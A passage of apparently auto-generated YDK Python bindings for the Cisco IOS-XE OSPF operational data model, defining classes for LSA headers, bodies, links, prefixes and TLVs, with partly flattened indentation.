        self.yang_parent_name = "lsa-body"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict()

        # Leaf registry: attribute name -> (YLeaf descriptor, accepted python types).
        leaf_specs = [
            ('rtr_priority', (YLeaf(YType.uint8, 'rtr-priority'), ['int'])),
            ('link_local_interface_address', (YLeaf(YType.str, 'link-local-interface-address'), ['str','str'])),
            ('num_of_prefixes', (YLeaf(YType.uint32, 'num-of-prefixes'), ['int'])),
            ('lsa_id_options', (YLeaf(YType.bits, 'lsa-id-options'), ['Bits'])),
        ]
        self._leafs = OrderedDict(leaf_specs)

        # Leaf values start out unset; the options leaf is a bit set.
        self.rtr_priority = None
        self.link_local_interface_address = None
        self.num_of_prefixes = None
        self.lsa_id_options = Bits()

        self._segment_path = lambda: "link-data"
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Funnel writes through ydk's validating setter for the declared leafs.
        self._perform_setattr(
            OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.LinkData,
            ['rtr_priority', 'link_local_interface_address', 'num_of_prefixes', 'lsa_id_options'],
            name, value)
class IaPrefix(Entity):
    """
    OSPFv3 intra-area prefixes.

    .. attribute:: referenced_ls_type

        Referenced Link State type

        **type**\: int

        **range:** 0..65535

        **config**\: False

    .. attribute:: referenced_link_state_id

        Referenced Link State ID

        **type**\: int

        **range:** 0..4294967295

        **config**\: False

    .. attribute:: referenced_adv_router

        Referenced Advertising Router (IPv4 or IPv6 address string)

        **type**\: str

        **config**\: False

    .. attribute:: num_of_prefixes

        Number of prefixes

        **type**\: int

        **range:** 0..65535

        **config**\: False

    """

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix, self).__init__()

        # Position of this container in the YANG tree.
        self.yang_name = "ia-prefix"
        self.yang_parent_name = "lsa-body"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict()

        # Leaf registry: attribute name -> (YLeaf descriptor, accepted python types).
        leaf_specs = [
            ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])),
            ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])),
            ('referenced_adv_router', (YLeaf(YType.str, 'referenced-adv-router'), ['str','str'])),
            ('num_of_prefixes', (YLeaf(YType.uint16, 'num-of-prefixes'), ['int'])),
        ]
        self._leafs = OrderedDict(leaf_specs)

        # Leaf values start out unset.
        self.referenced_ls_type = None
        self.referenced_link_state_id = None
        self.referenced_adv_router = None
        self.num_of_prefixes = None

        self._segment_path = lambda: "ia-prefix"
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Funnel writes through ydk's validating setter for the declared leafs.
        self._perform_setattr(
            OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3LsaVal.LsaBody.IaPrefix,
            ['referenced_ls_type', 'referenced_link_state_id', 'referenced_adv_router', 'num_of_prefixes'],
            name, value)
class Ospfv3Link(Entity):
    """
    OSPFv3 links, keyed by (interface-id, neighbor-interface-id,
    neighbor-router-id).

    .. attribute:: interface_id (key)

        Interface ID

        **type**\: int

        **range:** 0..4294967295

        **config**\: False

    .. attribute:: neighbor_interface_id (key)

        Neighbor interface ID

        **type**\: int

        **range:** 0..4294967295

        **config**\: False

    .. attribute:: neighbor_router_id (key)

        Neighbor router ID

        **type**\: int

        **range:** 0..4294967295

        **config**\: False

    .. attribute:: type

        Link type

        **type**\: int

        **range:** 0..255

        **config**\: False

    .. attribute:: metric

        Metric

        **type**\: int

        **range:** 0..65535

        **config**\: False

    """

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3Link, self).__init__()

        # Position of this list entry in the YANG tree.
        self.yang_name = "ospfv3-link"
        self.yang_parent_name = "link-scope-lsa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = ['interface_id','neighbor_interface_id','neighbor_router_id']
        self._child_classes = OrderedDict()

        # Leaf registry: attribute name -> (YLeaf descriptor, accepted python types).
        leaf_specs = [
            ('interface_id', (YLeaf(YType.uint32, 'interface-id'), ['int'])),
            ('neighbor_interface_id', (YLeaf(YType.uint32, 'neighbor-interface-id'), ['int'])),
            ('neighbor_router_id', (YLeaf(YType.uint32, 'neighbor-router-id'), ['int'])),
            ('type', (YLeaf(YType.uint8, 'type'), ['int'])),
            ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])),
        ]
        self._leafs = OrderedDict(leaf_specs)

        # Leaf values start out unset.
        self.interface_id = None
        self.neighbor_interface_id = None
        self.neighbor_router_id = None
        self.type = None
        self.metric = None

        # XPath segment includes one predicate per list key.
        self._segment_path = lambda: (
            "ospfv3-link[interface-id='%s'][neighbor-interface-id='%s'][neighbor-router-id='%s']"
            % (self.interface_id, self.neighbor_interface_id, self.neighbor_router_id))
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Funnel writes through ydk's validating setter for the declared leafs.
        self._perform_setattr(
            OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3Link,
            ['interface_id', 'neighbor_interface_id', 'neighbor_router_id', 'type', 'metric'],
            name, value)
class Ospfv3PrefixList(Entity):
    """
    OSPFv3 prefix-list entry, keyed by prefix.

    .. attribute:: prefix (key)

        Prefix

        **type**\: str

        **config**\: False

    .. attribute:: prefix_options

        Prefix options

        **type**\: str

        **config**\: False

    """

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3PrefixList, self).__init__()

        # Position of this list entry in the YANG tree.
        self.yang_name = "ospfv3-prefix-list"
        self.yang_parent_name = "link-scope-lsa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = ['prefix']
        self._child_classes = OrderedDict()

        # Leaf registry: attribute name -> (YLeaf descriptor, accepted python types).
        leaf_specs = [
            ('prefix', (YLeaf(YType.str, 'prefix'), ['str'])),
            ('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])),
        ]
        self._leafs = OrderedDict(leaf_specs)

        self.prefix = None
        self.prefix_options = None

        # XPath segment includes the list key predicate.
        self._segment_path = lambda: "ospfv3-prefix-list[prefix='%s']" % (self.prefix)
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Funnel writes through ydk's validating setter for the declared leafs.
        self._perform_setattr(
            OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3PrefixList,
            ['prefix', 'prefix_options'], name, value)
class Ospfv3IaPrefix(Entity):
    """
    OSPFv3 intra-area prefix-list entry, keyed by prefix.

    .. attribute:: prefix (key)

        Prefix

        **type**\: str

        **config**\: False

    .. attribute:: prefix_options

        Prefix options

        **type**\: str

        **config**\: False

    """

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3IaPrefix, self).__init__()

        # Position of this list entry in the YANG tree.
        self.yang_name = "ospfv3-ia-prefix"
        self.yang_parent_name = "link-scope-lsa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = ['prefix']
        self._child_classes = OrderedDict()

        # Leaf registry: attribute name -> (YLeaf descriptor, accepted python types).
        leaf_specs = [
            ('prefix', (YLeaf(YType.str, 'prefix'), ['str'])),
            ('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])),
        ]
        self._leafs = OrderedDict(leaf_specs)

        self.prefix = None
        self.prefix_options = None

        # XPath segment includes the list key predicate.
        self._segment_path = lambda: "ospfv3-ia-prefix[prefix='%s']" % (self.prefix)
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Funnel writes through ydk's validating setter for the declared leafs.
        self._perform_setattr(
            OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Ospfv3IaPrefix,
            ['prefix', 'prefix_options'], name, value)
class MultiTopology(Entity):
    """
    OSPF multi-topology interface augmentation, keyed by topology name.

    .. attribute:: name (key)

        One of the topology enabled on this interface

        **type**\: str

        **config**\: False

    """

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.MultiTopology, self).__init__()

        # Position of this list entry in the YANG tree.
        self.yang_name = "multi-topology"
        self.yang_parent_name = "link-scope-lsa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = ['name']
        self._child_classes = OrderedDict()

        # Single string leaf, which is also the list key.
        self._leafs = OrderedDict([
            ('name', (YLeaf(YType.str, 'name'), ['str'])),
        ])
        self.name = None

        # XPath segment includes the list key predicate.
        self._segment_path = lambda: "multi-topology[name='%s']" % (self.name)
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Funnel writes through ydk's validating setter for the declared leaf.
        self._perform_setattr(
            OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.MultiTopology,
            ['name'], name, value)
class Tlv(Entity):
    """
    Link TLV: traffic-engineering attributes of a link.

    .. attribute:: link_type

        Link type

        **type**\: int

        **range:** 0..255

        **config**\: False

    .. attribute:: link_id

        Link ID

        **type**\: int

        **range:** 0..4294967295

        **config**\: False

    .. attribute:: local_if_ipv4_addr

        List of local interface IPv4 addresses

        **type**\: list of str

        **config**\: False

    .. attribute:: local_remote_ipv4_addr

        List of remote interface IPv4 addresses

        **type**\: list of str

        **config**\: False

    .. attribute:: te_metric

        TE metric

        **type**\: int

        **range:** 0..4294967295

        **config**\: False

    .. attribute:: max_bandwidth

        Maximum bandwidth

        **type**\: :py:class:`Decimal64<ydk.types.Decimal64>`

        **config**\: False

    .. attribute:: max_reservable_bandwidth

        Maximum reservable bandwidth

        **type**\: :py:class:`Decimal64<ydk.types.Decimal64>`

        **config**\: False

    .. attribute:: unreserved_bandwidth

        Unreserved bandwidth

        **type**\: :py:class:`Decimal64<ydk.types.Decimal64>`

        **config**\: False

    .. attribute:: admin_group

        Administrative group/Resource class/Color

        **type**\: int

        **range:** 0..4294967295

        **config**\: False

    """

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Tlv, self).__init__()

        # Position of this container in the YANG tree.
        self.yang_name = "tlv"
        self.yang_parent_name = "link-scope-lsa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        self._child_classes = OrderedDict()

        # Leaf registry; the two address leafs are leaf-lists (YLeafList).
        leaf_specs = [
            ('link_type', (YLeaf(YType.uint8, 'link-type'), ['int'])),
            ('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])),
            ('local_if_ipv4_addr', (YLeafList(YType.str, 'local-if-ipv4-addr'), ['str','str'])),
            ('local_remote_ipv4_addr', (YLeafList(YType.str, 'local-remote-ipv4-addr'), ['str','str'])),
            ('te_metric', (YLeaf(YType.uint32, 'te-metric'), ['int'])),
            ('max_bandwidth', (YLeaf(YType.str, 'max-bandwidth'), ['Decimal64'])),
            ('max_reservable_bandwidth', (YLeaf(YType.str, 'max-reservable-bandwidth'), ['Decimal64'])),
            ('unreserved_bandwidth', (YLeaf(YType.str, 'unreserved-bandwidth'), ['Decimal64'])),
            ('admin_group', (YLeaf(YType.uint32, 'admin-group'), ['int'])),
        ]
        self._leafs = OrderedDict(leaf_specs)

        # Scalar leafs start unset; leaf-lists start empty.
        self.link_type = None
        self.link_id = None
        self.local_if_ipv4_addr = []
        self.local_remote_ipv4_addr = []
        self.te_metric = None
        self.max_bandwidth = None
        self.max_reservable_bandwidth = None
        self.unreserved_bandwidth = None
        self.admin_group = None

        self._segment_path = lambda: "tlv"
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Funnel writes through ydk's validating setter for the declared leafs.
        self._perform_setattr(
            OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.Tlv,
            ['link_type', 'link_id', 'local_if_ipv4_addr', 'local_remote_ipv4_addr', 'te_metric',
             'max_bandwidth', 'max_reservable_bandwidth', 'unreserved_bandwidth', 'admin_group'],
            name, value)
class UnknownSubTlv(Entity):
    """
    OSPFv2 Unknown sub TLV, keyed by TLV type.

    .. attribute:: type (key)

        TLV type

        **type**\: int

        **range:** 0..65535

        **config**\: False

    .. attribute:: length

        TLV length

        **type**\: int

        **range:** 0..65535

        **config**\: False

    .. attribute:: value

        TLV value

        **type**\: list of int

        **range:** 0..255

        **config**\: False

    """

    _prefix = 'ospf-ios-xe-oper'
    _revision = '2018-02-01'

    def __init__(self):
        super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.UnknownSubTlv, self).__init__()

        # Position of this list entry in the YANG tree.
        self.yang_name = "unknown-sub-tlv"
        self.yang_parent_name = "link-scope-lsa"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = ['type']
        self._child_classes = OrderedDict()

        # Leaf registry; 'value' is a leaf-list of raw bytes (uint8).
        leaf_specs = [
            ('type', (YLeaf(YType.uint16, 'type'), ['int'])),
            ('length', (YLeaf(YType.uint16, 'length'), ['int'])),
            ('value', (YLeafList(YType.uint8, 'value'), ['int'])),
        ]
        self._leafs = OrderedDict(leaf_specs)

        self.type = None
        self.length = None
        self.value = []

        # XPath segment includes the list key predicate.
        self._segment_path = lambda: "unknown-sub-tlv[type='%s']" % (self.type)
        self._is_frozen = True

    def __setattr__(self, name, value):
        # Funnel writes through ydk's validating setter for the declared leafs.
        self._perform_setattr(
            OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.LinkScopeLsa.UnknownSubTlv,
            ['type', 'length', 'value'], name, value)
class AreaScopeLsa(Entity):
"""
List OSPF area scope LSA databases
.. attribute:: lsa_type (key)
LSA Type
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: adv_router (key)
Advertising router
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: decoded_completed
The OSPF LSA body is fully decoded
**type**\: bool
**config**\: False
.. attribute:: raw_data
The complete LSA in network byte order as received/sent over the wire
**type**\: list of int
**range:** 0..255
**config**\: False
.. attribute:: ospfv2_lsa
OSPFv2 LSA
**type**\: :py:class:`Ospfv2Lsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa>`
**config**\: False
.. attribute:: ospfv2_link
Router LSA link
**type**\: list of :py:class:`Ospfv2Link <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Link>`
**config**\: False
.. attribute:: ospfv2_topology
Summary LSA
**type**\: list of :py:class:`Ospfv2Topology <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Topology>`
**config**\: False
.. attribute:: ospfv2_external
External LSA
**type**\: list of :py:class:`Ospfv2External <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2External>`
**config**\: False
.. attribute:: ospfv3_lsa
OSPFv3 LSA
**type**\: :py:class:`Ospfv3Lsa <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa>`
**config**\: False
.. attribute:: ospfv3_link
OSPFv3 links
**type**\: list of :py:class:`Ospfv3Link <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Link>`
**config**\: False
.. attribute:: ospfv3_prefix
OSPFv3 prefix\-list
**type**\: list of :py:class:`Ospfv3Prefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Prefix>`
**config**\: False
.. attribute:: ospfv3_ia_prefix
OSPFv3 intra\-area prefix\-list
**type**\: list of :py:class:`Ospfv3IaPrefix <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3IaPrefix>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
    super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa, self).__init__()

    # YANG tree bookkeeping: this is a list entry keyed by (lsa-type, adv-router).
    self.yang_name = "area-scope-lsa"
    self.yang_parent_name = "intf-link-scope-lsas"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = ['lsa_type','adv_router']
    # Child containers/lists reachable from this node: YANG name -> (python attr, class).
    self._child_classes = OrderedDict([("ospfv2-lsa", ("ospfv2_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa)), ("ospfv2-link", ("ospfv2_link", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Link)), ("ospfv2-topology", ("ospfv2_topology", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Topology)), ("ospfv2-external", ("ospfv2_external", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2External)), ("ospfv3-lsa", ("ospfv3_lsa", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa)), ("ospfv3-link", ("ospfv3_link", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Link)), ("ospfv3-prefix", ("ospfv3_prefix", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Prefix)), ("ospfv3-ia-prefix", ("ospfv3_ia_prefix", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3IaPrefix))])
    # Leaf registry: python attribute -> (YLeaf descriptor, accepted python types).
    self._leafs = OrderedDict([
        ('lsa_type', (YLeaf(YType.uint32, 'lsa-type'), ['int'])),
        ('adv_router', (YLeaf(YType.str, 'adv-router'), ['str','str'])),
        ('decoded_completed', (YLeaf(YType.boolean, 'decoded-completed'), ['bool'])),
        ('raw_data', (YLeafList(YType.uint8, 'raw-data'), ['int'])),
    ])
    # Leaf values start out unset; raw-data is a leaf-list of bytes.
    self.lsa_type = None
    self.adv_router = None
    self.decoded_completed = None
    self.raw_data = []

    # Eagerly instantiate the singleton child containers and wire them up.
    self.ospfv2_lsa = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa()
    self.ospfv2_lsa.parent = self
    self._children_name_map["ospfv2_lsa"] = "ospfv2-lsa"

    self.ospfv3_lsa = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv3Lsa()
    self.ospfv3_lsa.parent = self
    self._children_name_map["ospfv3_lsa"] = "ospfv3-lsa"

    # Child YANG lists start out empty.
    self.ospfv2_link = YList(self)
    self.ospfv2_topology = YList(self)
    self.ospfv2_external = YList(self)
    self.ospfv3_link = YList(self)
    self.ospfv3_prefix = YList(self)
    self.ospfv3_ia_prefix = YList(self)

    # XPath segment includes one predicate per list key.
    self._segment_path = lambda: "area-scope-lsa" + "[lsa-type='" + str(self.lsa_type) + "']" + "[adv-router='" + str(self.adv_router) + "']"
    # Freeze: further attribute writes are validated by __setattr__.
    self._is_frozen = True
def __setattr__(self, name, value):
    # Route every attribute write through ydk's validating setter for the
    # declared leafs of area-scope-lsa.
    self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa, ['lsa_type', 'adv_router', 'decoded_completed', 'raw_data'], name, value)
class Ospfv2Lsa(Entity):
"""
OSPFv2 LSA
.. attribute:: header
Decoded OSPFv2 LSA header data
**type**\: :py:class:`Header <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header>`
**config**\: False
.. attribute:: lsa_body
Decoded OSPFv2 LSA body data
**type**\: :py:class:`LsaBody <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa, self).__init__()
self.yang_name = "ospfv2-lsa"
self.yang_parent_name = "area-scope-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("header", ("header", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header)), ("lsa-body", ("lsa_body", OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody))])
self._leafs = OrderedDict()
self.header = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header()
self.header.parent = self
self._children_name_map["header"] = "header"
self.lsa_body = OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody()
self.lsa_body.parent = self
self._children_name_map["lsa_body"] = "lsa-body"
self._segment_path = lambda: "ospfv2-lsa"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa, [], name, value)
class Header(Entity):
"""
Decoded OSPFv2 LSA header data
.. attribute:: lsa_id
LSA ID
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: opaque_type
Opaque type
**type**\: int
**range:** 0..255
**config**\: False
.. attribute:: opaque_id
Opaque ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: age
LSA age
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: type
LSA type
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: adv_router
LSA advertising router
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: seq_num
LSA sequence number
**type**\: str
**config**\: False
.. attribute:: checksum
LSA checksum
**type**\: str
**config**\: False
.. attribute:: length
LSA length
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: flag_options
LSA options
**type**\: :py:class:`LsaFlagOptions <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.LsaFlagOptions>`
**config**\: False
"""
_prefix = 'ospf-ios-xe-oper'
_revision = '2018-02-01'
def __init__(self):
super(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header, self).__init__()
self.yang_name = "header"
self.yang_parent_name = "ospfv2-lsa"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])),
('opaque_type', (YLeaf(YType.uint8, 'opaque-type'), ['int'])),
('opaque_id', (YLeaf(YType.uint32, 'opaque-id'), ['int'])),
('age', (YLeaf(YType.uint16, 'age'), ['int'])),
('type', (YLeaf(YType.uint16, 'type'), ['int'])),
('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])),
('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])),
('checksum', (YLeaf(YType.str, 'checksum'), ['str'])),
('length', (YLeaf(YType.uint16, 'length'), ['int'])),
('flag_options', (YLeaf(YType.bits, 'flag-options'), ['Bits'])),
])
self.lsa_id = None
self.opaque_type = None
self.opaque_id = None
self.age = None
self.type = None
self.adv_router = None
self.seq_num = None
self.checksum = None
self.length = None
self.flag_options = Bits()
self._segment_path = lambda: "header"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.Header, ['lsa_id', 'opaque_type', 'opaque_id', 'age', 'type', 'adv_router', 'seq_num', 'checksum', 'length', 'flag_options'], name, value)
class LsaBody(Entity):
"""
Decoded OSPFv2 LSA body data
.. attribute:: num_of_links
Number of links
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: network
Network details
**type**\: :py:class:`Network <ydk.models.cisco_ios_xe.Cisco_IOS_XE_ospf_oper.OspfOperData.OspfState.OspfInstance.OspfArea.OspfInterface.IntfLinkScopeLsas.AreaScopeLsa.Ospfv2Lsa.LsaBody.Network>`
**config**\: False
.. attribute:: summary_mask
Summary mask
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: external_mask
External mask
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
